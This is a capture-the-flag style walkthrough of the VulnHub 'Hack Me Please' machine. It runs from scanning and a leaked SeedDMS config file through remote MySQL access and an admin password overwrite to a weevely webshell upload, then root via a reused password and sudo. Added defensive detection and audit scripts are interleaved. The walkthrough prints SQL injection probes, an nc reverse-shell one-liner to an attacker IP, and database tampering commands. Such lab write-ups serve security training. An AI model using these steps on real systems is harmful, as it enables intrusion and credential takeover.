Give up one morning's wind and moon, and gain the eternal open sky.
Target machine: https://www.vulnhub.com/entry/hack-me-please-1,731/
External foothold
Host discovery & port scan
Port 80 serves a static page.
MySQL: checked whether remote connections are accepted (they are).
白小羽
Tip: ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain. This error means the SSL/TLS certificate could not be verified while the client was setting up a secure connection to the server.
There are usually two ways around it:
- add the parameter --skip-ssl
- add the parameter --ssl-mode=DISABLED
The directory scan turned up an html page; the site is not written in PHP, so directory brute-forcing needs wfuzz or gobuster.
Since it is a static page, open the browser developer console directly. A comment in the page source mentions /seeddms51x/seeddms-5.1.22/:
// make sure this js file matches the application installed on our server endpoint: /seeddms51x/seeddms-5.1.22/
Visit the application:
http://10.10.10.201/seeddms51x/seeddms-5.1.22/
After a round of trial and error with the usual SQL injection test strings:
' or 1=1 --+
' or 1=1 -- +
' or 1=1#
" or 1=1 --+
" or 1=1 -- +
" || 1=1 -- +
" || 1=1 --+
" || 1=1 #
Continuing enumeration, the parent directory can be scanned as well:
gobuster dir -u http://10.10.10.201/seeddms51x -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js
Three directories are exposed:
/conf
/www
/pear
/conf/settings.xml
Fed it to an AI to summarize (note: using AI is absolutely not allowed in the OSCP exam).
With the database password in hand, log in remotely:
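From the defender's side, the two things that happened above leave clear traces in the web server log: a wordlist scan produces a burst of 404s from one client, and the leak itself is a 200 response for a path under /conf/. The following detector is an added example, not part of the original post; it parses Apache/nginx combined-format lines and the sample log it runs on is constructed here (the IPs, timestamps and user agent are assumptions, not captured traffic):

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" format; only the fields the checks need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# Paths that should never be served to anonymous clients under the web root.
SENSITIVE = ("/conf/", "settings.xml", "/.git/", "/.env", "config.php", ".bak")


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def analyse(lines, window=timedelta(seconds=60), max_404=20):
    """Return (kind, ip, detail) findings for brute-force bursts and config-file hits."""
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        by_ip[rec["ip"]].append(rec)
    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        # Sliding window over this client's 404s: more than max_404 of them
        # inside `window` is a wordlist scan, not a user mistyping URLs.
        misses = [r for r in recs if r["status"] == 404]
        start = 0
        for end in range(len(misses)):
            while misses[end]["ts"] - misses[start]["ts"] > window:
                start += 1
            if end - start + 1 > max_404:
                detail = "%d x 404 within %ds" % (end - start + 1, window.total_seconds())
                findings.append(("dir-bruteforce", ip, detail))
                break
        # A successful response for a sensitive path is a leak regardless of rate.
        for r in recs:
            if r["status"] == 200 and any(s in r["path"] for s in SENSITIVE):
                findings.append(("sensitive-file-served", ip, r["path"]))
    return findings


def constructed_log():
    """Constructed sample: one scanning client and one ordinary visitor."""
    base = datetime(2021, 7, 3, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '%s - - [%s] "GET %s HTTP/1.1" %d %d "-" "gobuster/3.1.0"'

    def stamp(t):
        return t.strftime("%d/%b/%Y:%H:%M:%S %z")

    lines = []
    for i in range(25):
        lines.append(fmt % ("10.10.10.128", stamp(base + timedelta(seconds=i)),
                            "/seeddms51x/word%d" % i, 404, 275))
    lines.append(fmt % ("10.10.10.128", stamp(base + timedelta(seconds=30)),
                        "/seeddms51x/conf/settings.xml", 200, 18203))
    lines.append('10.10.10.50 - - [%s] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"' % stamp(base))
    return lines


if __name__ == "__main__":
    for finding in analyse(constructed_log()):
        print(finding)
```

The rate check is deliberately separate from the path check: a slow scan stays under the 404 threshold, but the 200 for settings.xml is reported on its own, because a configuration file being served at all is the misconfiguration that matters here.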
┌──(root㉿kali)-[/data/demo]
└─# mysql -u seeddms -h 10.10.10.201 --skip-ssl -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 72
Server version: 8.0.25-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| seeddms |
| sys |
+--------------------+
5 rows in set (0.006 sec)
MySQL [(none)]> use seeddms
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [seeddms]> show tables;
+------------------------------+
| Tables_in_seeddms |
+------------------------------+
| tblACLs |
| tblAttributeDefinitions |
| tblCategory |
| tblDocumentApproveLog |
-------------------------------------------
| tblWorkflowTransitions |
| tblWorkflows |
| users |
+------------------------------+
43 rows in set (0.002 sec)
MySQL [seeddms]> select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
| 1 | saket | saurav | Saket@#$1337 |
+-------------+---------------------+--------------------+-----------------+
1 row in set (0.002 sec)
This turns up the password Saket@#$1337, but logging in with it fails.
MySQL [seeddms]> select * from tblUsers;
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwdExpiration | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | [email protected] | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL |
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
2 rows in set (0.001 sec)
Cracking the hash failed, so the other option is to modify the data: set the password to 123456, whose MD5 hash is e10adc3949ba59abbe56e057f20f883e:
update tblUsers set pwd='e10adc3949ba59abbe56e057f20f883e' where login='admin';
After the update, login succeeds.
There is one more piece of information in MySQL that must always be collected (if this is misconfigured it can lead directly to a shell):
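Two defensive points follow from the tblUsers dump and the update above: an unsalted MD5 column can be audited offline against a wordlist in milliseconds, and an administrator hash that silently changes is itself an indicator of compromise. The script below is an added example, not SeedDMS code; the baseline hash is the admin hash from the dump above, the "current" rows are constructed to reflect the state after the update, and the tiny wordlist and the PBKDF2 format are assumptions chosen for illustration:

```python
import hashlib
import hmac
import os

# Tiny constructed wordlist; a real audit would use a full leaked-password list.
COMMON_PASSWORDS = ["123456", "password", "admin", "12345678", "qwerty", "letmein"]
COMMON_MD5 = {hashlib.md5(p.encode()).hexdigest(): p for p in COMMON_PASSWORDS}

# Admin hash as it appeared in the original dump, kept as the known-good snapshot.
BASELINE = {"admin": "f9ef2c539bad8a6d2f3432b6d49ab51a"}
# Constructed rows representing the table after the UPDATE above.
CURRENT_ROWS = [("admin", "e10adc3949ba59abbe56e057f20f883e"), ("guest", None)]


def audit_users(rows, baseline):
    """rows: (login, pwd_hash) pairs as stored in tblUsers (unsalted MD5).
    baseline: login -> hash captured at a known-good point in time."""
    findings = []
    for login, pwd in rows:
        if pwd is None:  # accounts without a password, e.g. guest
            continue
        if pwd in COMMON_MD5:
            findings.append((login, "weak-password", COMMON_MD5[pwd]))
        if login in baseline and baseline[login] != pwd:
            findings.append((login, "hash-changed", pwd))
    return findings


# What a password column should hold instead: a salted, iterated hash.
def hash_password(password, salt=None, iterations=600_000):
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for finding in audit_users(CURRENT_ROWS, BASELINE):
        print(finding)
    stored = hash_password("Saket@#$1337")
    print(stored, verify_password("Saket@#$1337", stored))
```

The same wordlist check applied to the salted format finds nothing, because each hash must be recomputed per salt and per iteration count; that is the whole point of the change, and it is why the baseline comparison, not cracking, is the practical tamper check.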
MySQL [seeddms]> SHOW VARIABLES LIKE 'secure_file_priv';
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
1 row in set (0.019 sec)
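A value of /var/lib/mysql-files/ means file import and export are confined to that directory; an empty value would let INTO OUTFILE write anywhere the mysqld user can, and NULL disables the feature entirely. As an added example (not part of the original post), the following audit parses the ASCII tables the mysql CLI prints, classifies secure_file_priv, and lists accounts whose host pattern permits remote logins. The secure_file_priv text is the output shown above; the mysql.user listing is constructed, since the page does not show one:

```python
def parse_mysql_table(text):
    """Parse the ASCII table printed by the mysql/mariadb CLI into row dicts."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue  # skip +----+ borders and the "N rows in set" trailer
        cells = [c.strip() for c in line.strip("|").split("|")]
        rows.append(cells)
    if not rows:
        return []
    header, body = rows[0], rows[1:]
    return [dict(zip(header, r)) for r in body]


def assess_secure_file_priv(value):
    if value is None:
        return "unknown"        # variable not present in the output
    if value == "NULL":
        return "disabled"       # no LOAD DATA / INTO OUTFILE at all
    if value == "":
        return "unrestricted"   # INTO OUTFILE may write wherever mysqld can
    return "restricted"         # only inside the named directory


def remote_capable_accounts(user_rows):
    """Accounts whose host pattern allows logins from other machines."""
    local = {"localhost", "127.0.0.1", "::1"}
    return [r["user"] for r in user_rows if r["host"] not in local]


def audit(variables_text, users_text):
    variables = {r["Variable_name"]: r["Value"] for r in parse_mysql_table(variables_text)}
    return {
        "secure_file_priv": assess_secure_file_priv(variables.get("secure_file_priv")),
        "remote_accounts": remote_capable_accounts(parse_mysql_table(users_text)),
    }


# Output of SHOW VARIABLES LIKE 'secure_file_priv' as shown above.
VARIABLES_OUTPUT = """
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
1 row in set (0.019 sec)
"""

# Constructed listing for SELECT user, host FROM mysql.user (not from the page).
USERS_OUTPUT = """
+---------+-----------+
| user    | host      |
+---------+-----------+
| root    | localhost |
| seeddms | %         |
+---------+-----------+
2 rows in set (0.001 sec)
"""

if __name__ == "__main__":
    print(audit(VARIABLES_OUTPUT, USERS_OUTPUT))
```

The remote-host check is what makes the earlier step possible at all: an application account that only ever connects from the web server has no reason to carry a `%` host, and restricting it to localhost (together with bind-address) removes the remote login path even if the settings.xml leak happens again.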
Back in the admin panel, clicking "Add document" shows that file upload is allowed.
We use weevely to generate a PHP webshell (cross-platform, stealthy [better evasion], and with many built-in features):
weevely generate cmd shell.php
Upload it.
How do we find the path of the uploaded shell? Searching the historical vulnerabilities for this application turns up a command-execution one.
Looking at it, the document ID is needed:
example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd
The full payload is:
http://10.10.10.201/seeddms51x/data/1048576/10/1.php
Internal penetration
Use weevely to connect to the webshell:
weevely terminal http://10.10.10.201/seeddms51x/data/1048576/10/1.php cmd
Reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f
Create an interactive TTY:
python2 -c 'import pty; pty.spawn("/bin/bash")'
During internal enumeration I noticed logrotate.
Scheduled tasks:
www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ ls -al /etc/cron*
ls -al /etc/cron*
-rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d:
total 36
drwxr-xr-x 2 root root 4096 Jul 2 2021 .
drwxr-xr-x 133 root root 12288 Jul 3 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 285 Jul 16 2019 anacron
-rw-r--r-- 1 root root 201 Feb 13 2020 e2scrub_all
-rw-r--r-- 1 root root 712 Jun 20 2021 php
-rw-r--r-- 1 root root 191 Jul 2 2021 popularity-contest
/etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Jul 2 2021 .
drwxr-xr-x 133 root root 12288 Jul 3 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 311 Jul 16 2019 0anacron
-rwxr-xr-x 1 root root 539 Apr 13 2020 apache2
-rwxr-xr-x 1 root root 376 Dec 4 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 384 Nov 19 2019 cracklib-runtime
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
-rwxr-xr-x 1 root root 214 Dec 7 2020 update-notifier-common
www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ logrotate --version
logrotate --version
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
Unfortunately this cannot be exploited; the version is too new.
Then I thought of the moonlight web page seen at the beginning: it has a privilege escalation, but the PoC is written in C#, so it almost certainly does not apply to Linux.
What else has not been used yet? The users table in MySQL earlier held an account, saket, with the password:
Saket@#$1337
Checking /etc/passwd, this user does exist on the box.
www-data@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ su saket
su saket
Password: Saket@#$1337
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$
saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -l
sudo -l
[sudo] password for saket: Saket@#$1337
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User saket may run the following commands on ubuntu:
(ALL : ALL) ALL
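The `sudo -l` output above is the one piece of evidence a defender needs: a non-administrative account with `(ALL : ALL) ALL` turns any credential leak into root. As an added example (not part of the original post), here is a small auditor that parses `sudo -l` output, reports full-root, passwordless and wildcard entries, and is run on the output shown above plus one constructed NOPASSWD entry (the systemctl rule is an assumption, not something found on the box):

```python
import re

# One sudo rule line, e.g. "(root) NOPASSWD: SETENV: /usr/bin/foo, /usr/bin/bar"
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")
USER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):$")


def parse_sudo_l(text):
    """Return (user, host, entries) from `sudo -l` output; Defaults lines are ignored."""
    user = host = None
    entries = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        m = USER_RE.match(line)
        if m:
            user, host = m.group(1), m.group(2)
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        e = ENTRY_RE.match(line)
        if not e:
            continue
        tags = [t.strip() for t in e.group("tags").split(":") if t.strip()]
        entries.append({
            "runas": e.group("runas").strip(),
            "tags": tags,
            "cmds": [c.strip() for c in e.group("cmds").split(",")],
        })
    return user, host, entries


def audit_sudo(text):
    """(user, finding, detail) tuples for the risky rule shapes."""
    user, _host, entries = parse_sudo_l(text)
    findings = []
    for e in entries:
        if "ALL" in e["cmds"]:
            findings.append((user, "full-root", "(%s) ALL" % e["runas"]))
        if "NOPASSWD" in e["tags"]:
            findings.append((user, "passwordless", ", ".join(e["cmds"])))
        for c in e["cmds"]:
            if "*" in c:
                findings.append((user, "wildcard-command", c))
    return findings


# The sudo -l output captured above.
SAKET_OUTPUT = """
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User saket may run the following commands on ubuntu:
    (ALL : ALL) ALL
"""

# Constructed output for a service account with a scoped rule (assumption).
SCOPED_OUTPUT = """
User deploy may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/tail /var/log/apache2/*
"""

if __name__ == "__main__":
    for sample in (SAKET_OUTPUT, SCOPED_OUTPUT):
        for finding in audit_sudo(sample):
            print(finding)
```

The fix for the first sample is policy, not code: application-related accounts get an explicit command list, and anything that must run as root without a password is reviewed for wildcards, because `tail /var/log/apache2/*` is really "tail any path the invoker can name that starts with that prefix".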
saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -i
sudo -i
root@ubuntu:~# whoami
whoami
root
Privilege escalation complete.
Originally published on the WeChat public account 泷羽Sec: [OSCP] Hack_Me_Please: JS information leak and second-level directory traversal